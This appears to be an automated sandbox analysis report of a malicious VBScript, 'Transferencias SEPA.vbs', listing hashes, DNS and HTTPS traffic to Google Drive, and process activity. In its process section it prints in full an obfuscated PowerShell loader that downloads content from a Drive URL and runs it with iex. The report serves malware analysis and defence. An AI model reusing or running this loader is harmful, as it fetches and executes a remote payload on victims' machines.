                                  Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="aBS227ATl29gnNNpUDUpSw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo

                                  Static File Info

                                  General

                                  File type:ASCII text, with CRLF line terminators
                                  Entropy (8bit):5.256207699332008
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:Transferencias SEPA.vbs
                                  File size:216'069 bytes
                                  MD5:73abc522ed981b48b4be2ba972900b68
                                  SHA1:986995bde37b8ac4daff9b88e5d9bdf4f6b82d72
                                  SHA256:f0ecd3e8f225833c8b6b7945c99e1f5c8a4ccb3332cfb4b7ab7b63d7d98d88f4
                                  SHA512:1039b707aa1d6194b0ffabbf5b3e0f5b369b2919f4a3b07097724568a748cd18a4e30b44f17be5cdbb90e0c5eb572eb4c4bad2be0b7214aca1de7371238360af
                                  SSDEEP:6144:PYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJf3nqo:c2dOXQEX
                                  TLSH:5D2419F0CF0B36199F4B3EDAAC6445924AF88195051238B5AAD917EDB283D2CE3FDD14
                                  File Content Preview:..'Lollup kystvagt? newscasters195: wirrah: premade..'fernbrake; overdominating dures forsgsordnings?..'Rashnesses; ulykkesfuglene depositive stimulansers72..'Makroerne bidery? typewrote..'Jagtbderne nonleprous..'Dateringsforsgets128, maries:.. ..'Tordenb

                                  File Icon

                                  Icon Hash:68d69b8f86ab9a86

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 18, 2024 11:07:08.469103098 CEST49707443192.168.2.11173.194.219.101
                                  Apr 18, 2024 11:07:08.469161034 CEST44349707173.194.219.101192.168.2.11
                                  Apr 18, 2024 11:07:08.469296932 CEST49707443192.168.2.11173.194.219.101
                                  Apr 18, 2024 11:07:08.479219913 CEST49707443192.168.2.11173.194.219.101
                                  Apr 18, 2024 11:07:08.479242086 CEST44349707173.194.219.101192.168.2.11
                                  Apr 18, 2024 11:07:08.698513985 CEST44349707173.194.219.101192.168.2.11
                                  Apr 18, 2024 11:07:08.698589087 CEST49707443192.168.2.11173.194.219.101
                                  Apr 18, 2024 11:07:08.699616909 CEST44349707173.194.219.101192.168.2.11
                                  Apr 18, 2024 11:07:08.699676037 CEST49707443192.168.2.11173.194.219.101
                                  Apr 18, 2024 11:07:08.704387903 CEST49707443192.168.2.11173.194.219.101
                                  Apr 18, 2024 11:07:08.704400063 CEST44349707173.194.219.101192.168.2.11
                                  Apr 18, 2024 11:07:08.704677105 CEST44349707173.194.219.101192.168.2.11
                                  Apr 18, 2024 11:07:08.716284037 CEST49707443192.168.2.11173.194.219.101
                                  Apr 18, 2024 11:07:08.760123968 CEST44349707173.194.219.101192.168.2.11
                                  Apr 18, 2024 11:07:08.927824974 CEST44349707173.194.219.101192.168.2.11
                                  Apr 18, 2024 11:07:08.927910089 CEST44349707173.194.219.101192.168.2.11
                                  Apr 18, 2024 11:07:08.927953959 CEST49707443192.168.2.11173.194.219.101
                                  Apr 18, 2024 11:07:08.930643082 CEST49707443192.168.2.11173.194.219.101
                                  Apr 18, 2024 11:07:09.037683964 CEST49708443192.168.2.11173.194.219.132
                                  Apr 18, 2024 11:07:09.037729025 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.037807941 CEST49708443192.168.2.11173.194.219.132
                                  Apr 18, 2024 11:07:09.038228035 CEST49708443192.168.2.11173.194.219.132
                                  Apr 18, 2024 11:07:09.038242102 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.290869951 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.290951967 CEST49708443192.168.2.11173.194.219.132
                                  Apr 18, 2024 11:07:09.293761015 CEST49708443192.168.2.11173.194.219.132
                                  Apr 18, 2024 11:07:09.293767929 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.294064999 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.294986963 CEST49708443192.168.2.11173.194.219.132
                                  Apr 18, 2024 11:07:09.340120077 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.944955111 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.945017099 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.945055008 CEST49708443192.168.2.11173.194.219.132
                                  Apr 18, 2024 11:07:09.945064068 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.945092916 CEST44349708173.194.219.132192.168.2.11
                                  Apr 18, 2024 11:07:09.945110083 CEST49708443192.168.2.11173.194.219.132
                                  Apr 18, 2024 11:07:09.945142984 CEST49708443192.168.2.11173.194.219.132
                                  Apr 18, 2024 11:07:09.946854115 CEST49708443192.168.2.11173.194.219.132

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 18, 2024 11:07:08.359011889 CEST6431553192.168.2.111.1.1.1
                                  Apr 18, 2024 11:07:08.463291883 CEST53643151.1.1.1192.168.2.11
                                  Apr 18, 2024 11:07:08.932665110 CEST5080953192.168.2.111.1.1.1
                                  Apr 18, 2024 11:07:09.036909103 CEST53508091.1.1.1192.168.2.11

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Apr 18, 2024 11:07:08.359011889 CEST192.168.2.111.1.1.10x54a8Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:08.932665110 CEST192.168.2.111.1.1.10x81aaStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Apr 18, 2024 11:07:04.496249914 CEST1.1.1.1192.168.2.110x738eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.53.35A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:04.496249914 CEST1.1.1.1192.168.2.110x738eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.50.99A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:04.496249914 CEST1.1.1.1192.168.2.110x738eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.50.24A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:04.496249914 CEST1.1.1.1192.168.2.110x738eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.48.35A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:04.496249914 CEST1.1.1.1192.168.2.110x738eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.50.38A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:04.496249914 CEST1.1.1.1192.168.2.110x738eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.51.24A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:04.496249914 CEST1.1.1.1192.168.2.110x738eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.55.36A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:04.496249914 CEST1.1.1.1192.168.2.110x738eNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.50.39A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:08.463291883 CEST1.1.1.1192.168.2.110x54a8No error (0)drive.google.com173.194.219.101A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:08.463291883 CEST1.1.1.1192.168.2.110x54a8No error (0)drive.google.com173.194.219.113A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:08.463291883 CEST1.1.1.1192.168.2.110x54a8No error (0)drive.google.com173.194.219.139A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:08.463291883 CEST1.1.1.1192.168.2.110x54a8No error (0)drive.google.com173.194.219.102A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:08.463291883 CEST1.1.1.1192.168.2.110x54a8No error (0)drive.google.com173.194.219.100A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:08.463291883 CEST1.1.1.1192.168.2.110x54a8No error (0)drive.google.com173.194.219.138A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:09.036909103 CEST1.1.1.1192.168.2.110x81aaNo error (0)drive.usercontent.google.com173.194.219.132A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:36.005597115 CEST1.1.1.1192.168.2.110xfaddNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:07:36.005597115 CEST1.1.1.1192.168.2.110xfaddNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:08:23.406512976 CEST1.1.1.1192.168.2.110xaf33No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Apr 18, 2024 11:08:23.406512976 CEST1.1.1.1192.168.2.110xaf33No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • drive.google.com
                                  • drive.usercontent.google.com

                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.1149707173.194.219.1014436536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-18 09:07:08 UTC215OUTGET /uc?export=download&id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-04-18 09:07:08 UTC1582INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Thu, 18 Apr 2024 09:07:08 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'nonce-RaBasBAB1ERwj8h7eZxU5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.1149708173.194.219.1324436536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-18 09:07:09 UTC233OUTGET /download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.usercontent.google.com
                                  Connection: Keep-Alive
                                  2024-04-18 09:07:09 UTC2120INHTTP/1.1 200 OK
                                  X-GUploader-UploadID: ABPtcPqGrhCss4brSa7lea_e8uEKYMH6l_1EvZiep0ELHVKJxplBb0HDxyZHfJynSeGCUtF4vA
                                  Content-Type: text/html; charset=utf-8
                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Thu, 18 Apr 2024 09:07:09 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'nonce-JQ0T_puuGKTirJFt-9B0hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Resource-Policy: same-site
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw15BisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIiHY-_R5o1sAg_unVnMDAAJlRWH"
                                  Content-Length: 1692
                                  Server: UploadServer
                                  Set-Cookie: NID=513=Ls_LvMv3P2xdRuUbrBJi_84pet3K35bGcMZfJ9SA6JkB_kSrx63gXUUTjVMUIH1fc1Gxj47buSCvGb9QQz9IH0-6RjKVRVfxcbynMNFyUbx2WbSN8hC5x35LVCtQiHrY3mdmu2RPokZrc84__v3a9csN_K_FCQmHbgPf48IH394; expires=Fri, 18-Oct-2024 09:07:09 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                  2024-04-18 09:07:09 UTC1692INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 42 53 32 32 37 41 54 6c 32 39 67 6e 4e 4e 70 55 44 55 70 53 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                  Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="aBS227ATl29gnNNpUDUpSw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:11:07:03
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs"
                                  Imagebase:0x7ff77a2a0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:11:07:05
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnudmLappa.Brug.NTallee KafftFersk.teddyW B,chestosnbAffreCtredalknastiDemoke To enCompetBrode ');anthropometry (Toxophilism87 'Be.ol$umaadGGge.de Uar,nTymbaaTha.ln EvejvDelpreCyllonSensodAss seLovbelSidetsNynaze Eksesy,unglSmackoSt.fsvA,tiaeRetian Per.e.inocs Vult. svinH,undfeMele.atelemd StraeInterrDissis Bo.e[Diona$Sek.nNGrnsey,eflet PredtFortyeBde insignadBiplae ManasAppro]An iu= .uic$Lexi.GAlfadi Equim.bjecmGeldeeSkr.erR.stalNoaa.aHi,simSpaltsStorh ');$Ampereomraadet=Toxophilism87 'balloGBut oeSideon kibsaMo.ybnresi,vIn faeBrakinKl.kedT ukhe Elevl H,ngsring e m shs Acrolsu,faoBank vSquase BhutnSaniceOk ids Fler.TilgaDSo.anoPaterw taktnebulll solsoB.rina verhd,efleF.ortliOrdgylDiploeAuto (Wo,se$PaataF ris,r PaleaL gderRegasaUnpepaRokk,d o,deeLodssdAsbe.e Po,b,Vi.il$ Hje ERhabdx Gynetserote OverrMeninnSkrubastryklOmlahiNicotsOvervt V ne)freml ';$Ampereomraadet=$liquorish[1]+$Ampereomraadet;$Externalist=$liquorish[0];anthropometry (Toxophilism87 'c.alo$Evelig.croalSwon.oSh,nkbGrensaptakilAccel:ScurfF De ulTop,gySkivgtRentet Udste ,ilid Afv eDmret5B,dtv3Semem=touch(Hyd tTJerseeRetousCarkit,eled- nconPProfoa DiartPreaphIndiv Hane,$ .ydaES.rifxTitretPree,eMagrerFlbedn ManiaEntonl S,ori Bin,sLugsatIs.la)Svirv ');while (!$Flyttede53) {anthropometry (Toxophilism87 'Exter$A.etagUnwillF.skeoRutscbAn.ihaAthyml Aale:StackU ReconValmuiVarmeoeffecnDidnhe ArberSpi tnSireneN,isk=Snarl$G atbtGenlorafgifuUru,ueTalsm ') ;anthropometry $Ampereomraadet;anthropometry (Toxophilism87 'UnconSIsospt.bsciaBank rDemartPara -TowelSAdvoklPaavie VapoeInd,fp Bran agna.4H rbi ');anthropometry (Toxophilism87 'Respo$PseudgO.ervl Jul.oRad.lbHypoma B bulSy.te: FaglFGagerlThen,yBaggrtSailptBun,ee Fro.dTrefae Uful5 jene3 st i=Over,(Un.alTAllegeC,kels Hi rtFagud-Lew,sPFlaucaPseudtAcrobh Drak Chim$Het rE Sti,xSndr tChondeComper AftenHmorra AlerlOpspoiWissfsHorolt O cu)Arbej ') ;anthropometry (Toxophilism87 'Laven$Udskng ,ecolS.bpeo.nforbAf,ada Ba elKvart: KorsROssmie sdumsTer,iiFjerngBort,nPlatte PolarTor,l7preda7Seeds=Speci$Neostg VeralcigaroEpimybOptllaTvrfalHasta: mblaKin.ttFigurl Per a SkrmsKnudde .umbnCerem+,ryll+Nonju%Verni$PlastU indwnAkkomd rgeeUnciar Au,ovma.thgFurunt.egroiCarpog Folkh UnuteH.emod Be,isStilm1Bille3afval4 Ambu.BoudocAgg eo Slufu,rndvn CeretUnsal ') ;$Fraraadede=$Undervgtigheds134[$Resigner77];}anthropometry (Toxophilism87 ' Snoo$ Ce.egBannelAffalo,aldybRo.leaN.ngrlKortl:H.nstNQuizeoP.lshnStyr,cTabitoOverpn Su asBecrat.oyalrO,dknuInhalcRoupetPectiiAromeoTofron Yuca Chak=Gen e MonogGTranse bio,tConge-PommeCHjer okashunUncoftSvve,eunangnAu,omtTmrer .kraa$ProsoE PlebxVedhntdanefe.langrGamogn .fbraHid rlRes.piClouesMu.ift Form ');anthropometry (Toxophilism87 'Anlg $unencgommatlSalg oSteelbUnbecaMe,allHelle:AllurDHumpbaskovanServenEthicePlenulDiurnsNotioe Myeln,ekst Pig t=Straf Det.[HuskeS TaagyAr,its rtshtAberre BoffmMedli.GengaCNedsloKomtenKatapvOv.rseSy,osrlli,gtUnmat]Expro:,argi: topmFSagkyrDevouoI.conm NarrB TegnaPy.mysSorroeGaste6Tyl.s4BabyeS Middtko.parFilitiStrimn.ispugHande(Affec$Rep.gNVir.loVet.rnKontocHypheoGribenSpisesG inst N.dkrLirkeu YankcHundetGeosiiForuno Da tnDagsk)L raw ');anthropometry (Toxophilism87 'Vejar$Holocg MicelSma hoHelhebs,miaa,ahool Or.i:Umbe,SMetolaGrubenFejl.sUdspaeValorlHaabeiP,atygAtom hT emoeu,ilad Koks Plagi=Gkke, anma,[ SamfST.uchyTvangsSkar,tGigasePredim.tten.NagysTf.ongeVristxNull.t omot. PengEForsonFixatcErklroLseladFuturiSamlenhypo,g Broc]Mel n: Rhin:Hij cA KiosS Mar C Kva,IHypopIFlids.O rafG Ink.eL.bstt UnroShype.tUdeblrS edpiBortgn Of.egCent (K uli$TaageD JongaFirepn C rinDefiaeTidsbl Igans,dspaeVapsenMedic)Varie ');anthropometry (Toxophilism87 ' sp.g$Goni.g HaralArkimoOverrbBiotoaRoyallOrdre: V tiFMed,cyPausenHyttebC oreo.herme Kis.r Encan IdreeFldeb=patri$Bere,SFoulma sktnKatols Op.ae DemolSo,iviGrnseg .ilphAcroseFrlaadEfter. Un,asGirokuhotmebTeknosKassetPyrenr Ep sist renOsteogParis(Syste3 Bor,0Spati4Thwar9O,ner8 Lang2Doler,pil t2 E.in9 adi3Koinc4 ,nde8Klu.e) Kult ');anthropometry $Fynboerne;"
                                  Imagebase:0x7ff6eb350000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:11:07:05
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff68cce0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:11:07:07
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $"
                                  Imagebase:0x7ff659830000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Executed Functions

                                    Function 00007FFE7E9856CA Relevance: .1, Instructions: 74COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1437399587.00007FFE7E980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a72538a8c20ce0528c26c34a417946f06e7b5efd92a98b79d3311f299a35618
                                    • Instruction ID: b5d51450920c3a3ab9aa07985f836a863b8d445717c7b03a534baf9376305588
                                    • Opcode Fuzzy Hash: 2a72538a8c20ce0528c26c34a417946f06e7b5efd92a98b79d3311f299a35618
                                    • Instruction Fuzzy Hash: 63216A1559E3C1AFD35797781CB46A63FA8AF43214B0844EBE0D8CB4F7D90C191AC3A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

